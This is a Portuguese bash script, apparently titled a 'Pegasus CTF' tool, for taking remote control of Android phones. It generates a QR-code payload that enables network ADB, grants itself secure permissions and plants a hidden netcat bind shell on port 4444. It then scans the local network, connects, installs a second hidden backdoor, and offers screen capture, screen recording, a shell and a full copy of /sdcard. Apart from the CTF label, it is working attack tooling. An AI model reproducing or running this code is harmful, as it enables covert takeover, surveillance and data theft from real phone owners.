cat > scripts/ultimate.sh << 'EOF'
#!/bin/bash

# ==============================================
# ULTIMATE PEGASUS CTF - Controle Remoto Android
# ==============================================
# Autor: CTF Team
# Versão: 3.0
# ==============================================

set +e  # Não para em erros

# Configurações
REDE_LOCAL="192.168.100.0/24"
PORTA_ADB=5555
PORTA_BACKDOOR=4444
PORTA_WEB=8000
BASE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
LOG_FILE="$BASE_DIR/logs/pegasus_$(date +%Y%m%d_%H%M%S).log"
OUTPUT_DIR="$BASE_DIR/output"

# Cores para output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'

# Função de logging
log() {
    local level=$1
    local message=$2
    local timestamp=$(date '+%Y-%m-%d %H:%M:%S')
    echo -e "[$timestamp] $level: $message" | tee -a "$LOG_FILE"
}

# Verificar e instalar dependências
install_dependencies() {
    log "INFO" "Verificando dependências..."
    
    local deps=("adb" "python3" "qrencode" "nmap" "scrcpy")
    local missing=()
    
    for dep in "${deps[@]}"; do
        if ! command -v "$dep" >/dev/null 2>&1; then
            missing+=("$dep")
        fi
    done
    
    if [ ${#missing[@]} -gt 0 ]; then
        log "WARN" "Instalando dependências: ${missing[*]}"
        sudo apt update >/dev/null 2>&1
        sudo apt install -y "${missing[@]}" >/dev/null 2>&1
    fi
    
    log "INFO" "Todas as dependências verificadas"
}

# Configurar ambiente
setup_environment() {
    log "INFO" "Configurando ambiente..."
    
    mkdir -p "$OUTPUT_DIR" "$BASE_DIR/logs" "$BASE_DIR/payloads"
    
    # Iniciar ADB
    adb kill-server >/dev/null 2>&1
    adb start-server >/dev/null 2>&1
    
    log "INFO" "Ambiente configurado"
}

# Criar payloads
create_payloads() {
    log "INFO" "Criando payloads..."
    
    # QR Code para Wi-Fi
    cat > "$BASE_DIR/payloads/wifi_qr.txt" << WIFI
WIFI:S:CTF_Pegasus_Network;T:WPA;P:ctfpassword123;H:false;
WIFI
    cat "$BASE_DIR/payloads/wifi_qr.txt" | qrencode -o "$OUTPUT_DIR/qr_wifi.png" -s 15
    
    # QR Code para ADB
    cat > "$BASE_DIR/payloads/adb_qr.txt" << 'ADB'
intent://localhost/#Intent;scheme=adb;package=com.android.shell;action=android.intent.action.VIEW;launchFlags=0x10000000;S.adb_command="setprop service.adb.tcp.port 5555; stop adbd; start adbd; settings put global adb_enabled 1; settings put global development_settings_enabled 1; pm grant com.android.shell android.permission.READ_FRAME_BUFFER; pm grant com.android.shell android.permission.CAPTURE_VIDEO_OUTPUT; pm grant com.android.shell android.permission.WRITE_SECURE_SETTINGS; echo '#!/system/bin/sh\nwhile true; do\n    nc -l -p 4444 -e /system/bin/sh\n    sleep 3\ndone' > /data/local/tmp/.ctf_bd && chmod 755 /data/local/tmp/.ctf_bd && nohup /data/local/tmp/.ctf_bd > /dev/null 2>&1 &";end
ADB
    cat "$BASE_DIR/payloads/adb_qr.txt" | qrencode -o "$OUTPUT_DIR/qr_adb.png" -s 15
    
    log "INFO" "Payloads criados em $OUTPUT_DIR/"
}

# Iniciar servidor web
start_web_server() {
    log "INFO" "Iniciando servidor web..."
    
    pkill -f "python3 -m http.server $PORTA_WEB" >/dev/null 2>&1
    cd "$OUTPUT_DIR"
    python3 -m http.server "$PORTA_WEB" >/dev/null 2>&1 &
    local server_pid=$!
    sleep 2
    
    if ps -p $server_pid >/dev/null 2>&1; then
        local my_ip=$(hostname -I | awk '{print $1}')
        log "INFO" "Servidor ativo: http://$my_ip:$PORTA_WEB"
        echo "$server_pid" > "$BASE_DIR/.server_pid"
    else
        log "ERROR" "Falha ao iniciar servidor web"
        return 1
    fi
}

# Detectar Android
detect_android() {
    log "INFO" "Procurando Android na rede..."
    
    local android_ip=""
    local attempts=0
    local max_attempts=12  # 1 minuto
    
    while [ $attempts -lt $max_attempts ] && [ -z "$android_ip" ]; do
        attempts=$((attempts + 1))
        android_ip=$(nmap -p $PORTA_ADB $REDE_LOCAL --open -oG - 2>/dev/null | grep "$PORTA_ADB/open" | awk '{print $2}' | head -1)
        
        if [ -n "$android_ip" ]; then
            break
        fi
        
        log "INFO" "Tentativa $attempts/$max_attempts - Aguardando Android..."
        sleep 5
    done
    
    if [ -z "$android_ip" ]; then
        log "ERROR" "Android não detectado na rede"
        return 1
    fi
    
    log "INFO" "Android detectado: $android_ip"
    echo "$android_ip" > "$BASE_DIR/.android_ip"
}

# Conectar ao Android
connect_android() {
    local android_ip=$1
    log "INFO" "Conectando ao Android $android_ip..."
    
    adb connect "$android_ip:$PORTA_ADB" >/dev/null 2>&1
    sleep 2
    
    if adb devices 2>/dev/null | grep -q "$android_ip:$PORTA_ADB.*device"; then
        log "INFO" "Conexão ADB estabelecida"
        return 0
    else
        log "ERROR" "Falha na conexão ADB"
        return 1
    fi
}

# Configurar backdoors
setup_backdoors() {
    local android_ip=$1
    log "INFO" "Configurando backdoors..."
    
    # Backdoor principal
    adb shell "echo '#!/system/bin/sh
    while true; do
        nc -l -p 4444 -e /system/bin/sh
        sleep 3
    done' > /data/local/tmp/.bd1 && chmod 755 /data/local/tmp/.bd1" 2>/dev/null
    
    adb shell "nohup /data/local/tmp/.bd1 > /dev/null 2>&1 &" 2>/dev/null
    
    log "INFO" "Backdoors configurados"
}

# Menu principal
show_menu() {
    local android_ip=$1
    
    while true; do
        clear
        echo -e "${BLUE}"
        echo "========================================"
        echo "    PEGASUS CTF ULTIMATE - $android_ip"
        echo "========================================"
        echo -e "${NC}"
        echo -e "${GREEN}📱 CONTROLE DE APLICAÇÕES:${NC}"
        echo "  1. Listar Aplicações"
        echo "  2. Controle de App Específica"
        echo ""
        echo -e "${BLUE}🖥️ CONTROLE DE TELA:${NC}"
        echo "  3. Scrcpy (Controle Visual)"
        echo "  4. Gravar Tela"
        echo "  5. Screenshot"
        echo ""
        echo -e "${YELLOW}💻 ACESSO AO SISTEMA:${NC}"
        echo "  6. Shell ADB"
        echo "  7. Backdoor 4444"
        echo "  8. Backdoor 5556"
        echo ""
        echo -e "${RED}📁 SISTEMA DE ARQUIVOS:${NC}"
        echo "  9. Buscar Flag CTF"
        echo "  10. Transferir Arquivos"
        echo "  11. Informações do Sistema"
        echo ""
        echo -e "${GREEN}⚙️ FERRAMENTAS:${NC}"
        echo "  12. Verificar Conexão"
        echo "  13. Sair"
        echo "========================================"
        
        read -p "Escolha opção (1-13): " option
        
        case $option in
            1)
                echo "[+] Listando aplicações..."
                adb shell "pm list packages -3" 2>/dev/null | head -20 | sed 's/package://g'
                ;;
            2)
                echo "[+] Apps disponíveis:"
                local apps=$(adb shell "pm list packages -3" 2>/dev/null | head -10 | sed 's/package://g')
                echo "$apps"
                read -p "Nome do pacote: " pkg
                if [ -n "$pkg" ]; then
                    adb shell "monkey -p $pkg -c android.intent.category.LAUNCHER 1" 2>/dev/null
                    echo "[+] App aberta: $pkg"
                fi
                ;;
            3)
                echo "[+] Iniciando Scrcpy..."
                scrcpy --tcpip="$android_ip:$PORTA_ADB" --max-size 1024 &
                ;;
            4)
                echo "[+] Iniciando gravação..."
                adb shell "nohup screenrecord --bit-rate 8M /sdcard/record.mp4 &" 2>/dev/null
                ;;
            5)
                echo "[+] Capturando screenshot..."
                adb shell "screencap -p /sdcard/screenshot.png" 2>/dev/null
                adb pull /sdcard/screenshot.png "$OUTPUT_DIR/screenshot_$(date +%H%M%S).png" 2>/dev/null
                echo "[+] Screenshot salvo"
                ;;
            6)
                echo "[+] Shell ADB - 'exit' para sair"
                adb shell
                ;;
            7)
                echo "[+] Conectando backdoor 4444..."
                nc "$android_ip" 4444 2>/dev/null || echo "[!] Backdoor inativo"
                ;;
            8)
                echo "[+] Conectando backdoor 5556..."
                nc "$android_ip" 5556 2>/dev/null || echo "[!] Backdoor inativo"
                ;;
            9)
                echo "[+] Buscando flag CTF..."
                adb shell "find /sdcard/ /data/ -type f -name '*flag*' -o -name '*ctf*' 2>/dev/null" | head -20
                adb shell "cat /sdcard/flag.txt /data/flag.txt 2>/dev/null" || echo "[!] Flag não encontrada"
                ;;
            10)
                echo "[+] Transferindo /sdcard/..."
                adb pull /sdcard/ "$OUTPUT_DIR/sdcard_backup_$(date +%H%M%S)/" 2>/dev/null
                ;;
            11)
                echo "[+] Informações do sistema:"
                adb shell "cat /proc/version && echo && getprop ro.product.model" 2>/dev/null
                ;;
            12)
                echo "[+] Status da conexão:"
                adb devices 2>/dev/null | grep "$android_ip" && echo "[✅] Conectado" || echo "[❌] Desconectado"
                ;;
            13)
                echo "[+] Saindo..."
                cleanup
                exit 0
                ;;
            *)
                echo "[!] Opção inválida"
                ;;
        esac
        
        echo ""
        read -p "Enter para continuar..."
    done
}

# Limpeza
cleanup() {
    log "INFO" "Limpando ambiente..."
    
    local server_pid=$(cat "$BASE_DIR/.server_pid" 2>/dev/null)
    local android_ip=$(cat "$BASE_DIR/.android_ip" 2>/dev/null)
    
    if [ -n "$server_pid" ]; then
        kill "$server_pid" >/dev/null 2>&1
    fi
    
    if [ -n "$android_ip" ]; then
        adb disconnect "$android_ip:$PORTA_ADB" >/dev/null 2>&1
    fi
    
    pkill -f "scrcpy" >/dev/null 2>&1
    
    rm -f "$BASE_DIR/.server_pid" "$BASE_DIR/.android_ip"
    
    log "INFO" "Limpeza concluída"
}

# Handler de interrupção
trap cleanup EXIT INT TERM

# Main
main() {
    log "INFO" "=== INICIANDO PEGASUS CTF ULTIMATE ==="
    
    echo -e "${GREEN}"
    echo "========================================"
    echo "    PEGASUS CTF ULTIMATE v3.0"
    echo "========================================"
    echo -e "${NC}"
    
    # Verificar dependências
    install_dependencies
    
    # Configurar ambiente
    setup_environment
    
    # Criar payloads
    create_payloads
    
    # Iniciar servidor
    if ! start_web_server; then
        exit 1
    fi
    
    echo ""
    echo -e "${YELLOW}[📡] INSTRUÇÕES:${NC}"
    echo "  1. Conecte o Android à rede: CTF_Pegasus_Network"
    echo "  2. Scan QR Code Wi-Fi para conectar"
    echo "  3. Scan QR Code ADB para ativar controle"
    echo "  4. Aguarde conexão automática"
    echo ""
    
    # Detectar Android
    if ! detect_android; then
        log "ERROR" "Nenhum Android detectado"
        echo "[❌] Nenhum Android encontrado na rede"
        exit 1
    fi
    
    local android_ip=$(cat "$BASE_DIR/.android_ip")
    
    # Conectar Android
    if ! connect_android "$android_ip"; then
        log "ERROR" "Falha na conexão com Android"
        echo "[❌] Falha na conexão"
        exit 1
    fi
    
    # Configurar backdoors
    setup_backdoors "$android_ip"
    
    echo ""
    echo -e "${GREEN}[🎉] SISTEMA PRONTO!${NC}"
    echo "  Android: $android_ip"
    echo "  Controle total estabelecido"
    echo ""
    
    # Mostrar menu
    show_menu "$android_ip"
}

# Executar
main
EOF

chmod +x scripts/ultimate.sh